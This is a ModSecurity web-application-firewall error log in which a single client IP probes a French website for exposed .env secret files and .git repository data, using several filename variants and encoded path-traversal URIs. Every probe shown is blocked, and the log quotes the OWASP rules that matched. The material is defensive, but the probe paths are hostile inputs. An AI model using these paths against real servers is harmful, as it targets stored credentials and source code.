[Tue May 12 05:10:31.923819 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKaJzue9Sp-pIv_Bb69GAAAAUE"]
[Tue May 12 05:10:31.924281 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env#"] [unique_id "agKaJ9r1yOh9TvizeziYugAAAEQ"]
[Tue May 12 05:10:31.924401 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env#"] [unique_id "agKaJ9r1yOh9TvizeziYugAAAEQ"]
[Tue May 12 05:10:31.924459 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaJ3o6NvB9WXx5V-6nHQAAAQE"]
[Tue May 12 05:10:31.924574 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaJ3o6NvB9WXx5V-6nHQAAAQE"]
[Tue May 12 05:10:31.924577 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKaJ81tk6y7yBJLpJozJQAAAIU"]
[Tue May 12 05:10:31.924593 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env#"] [unique_id "agKaJ9r1yOh9TvizeziYugAAAEQ"]
[Tue May 12 05:10:31.924628 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKaJ81tk6y7yBJLpJozJQAAAIU"]
[Tue May 12 05:10:31.924662 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKaJ81tk6y7yBJLpJozJQAAAIU"]
[Tue May 12 05:10:31.924704 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKaJ81tk6y7yBJLpJozJQAAAIU"]
[Tue May 12 05:10:31.924758 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.example"] [unique_id "agKaJ3o6NvB9WXx5V-6nHQAAAQE"]
[Tue May 12 05:10:31.924785 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJxfeipD4uoG21FoqGAAAABc"]
[Tue May 12 05:10:31.924806 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKaJ81tk6y7yBJLpJozJQAAAIU"]
[Tue May 12 05:10:31.924847 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJxfeipD4uoG21FoqGAAAABc"]
[Tue May 12 05:10:31.924968 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJxfeipD4uoG21FoqGAAAABc"]
[Tue May 12 05:10:31.925012 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKaJ81tk6y7yBJLpJozJQAAAIU"]
[Tue May 12 05:10:31.925046 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaJwgpmE1yW0glLdgniQAAANQ"]
[Tue May 12 05:10:31.925160 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaJwgpmE1yW0glLdgniQAAANQ"]
[Tue May 12 05:10:31.925160 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GQAAAUk"]
[Tue May 12 05:10:31.925173 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJxfeipD4uoG21FoqGAAAABc"]
[Tue May 12 05:10:31.925212 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GQAAAUk"]
[Tue May 12 05:10:31.925323 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GQAAAUk"]
[Tue May 12 05:10:31.925345 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaJwgpmE1yW0glLdgniQAAANQ"]
[Tue May 12 05:10:31.925346 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GgAAAUo"]
[Tue May 12 05:10:31.925431 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKaJ81tk6y7yBJLpJozJgAAAIo"]
[Tue May 12 05:10:31.925455 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GgAAAUo"]
[Tue May 12 05:10:31.925510 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GQAAAUk"]
[Tue May 12 05:10:31.925542 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKaJ81tk6y7yBJLpJozJgAAAIo"]
[Tue May 12 05:10:31.925641 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69GgAAAUo"]
[Tue May 12 05:10:31.925739 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKaJ81tk6y7yBJLpJozJgAAAIo"]
[Tue May 12 05:10:31.925787 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.save"] [unique_id "agKaJ9r1yOh9TvizeziYvAAAAEc"]
[Tue May 12 05:10:31.925848 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaJwgpmE1yW0glLdgnigAAANg"]
[Tue May 12 05:10:31.925910 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.save"] [unique_id "agKaJ9r1yOh9TvizeziYvAAAAEc"]
[Tue May 12 05:10:31.925979 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaJwgpmE1yW0glLdgnigAAANg"]
[Tue May 12 05:10:31.926100 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.save"] [unique_id "agKaJ9r1yOh9TvizeziYvAAAAEc"]
[Tue May 12 05:10:31.926167 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaJwgpmE1yW0glLdgnigAAANg"]
[Tue May 12 05:10:31.926236 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.txt"] [unique_id "agKaJ81tk6y7yBJLpJozJwAAAI4"]
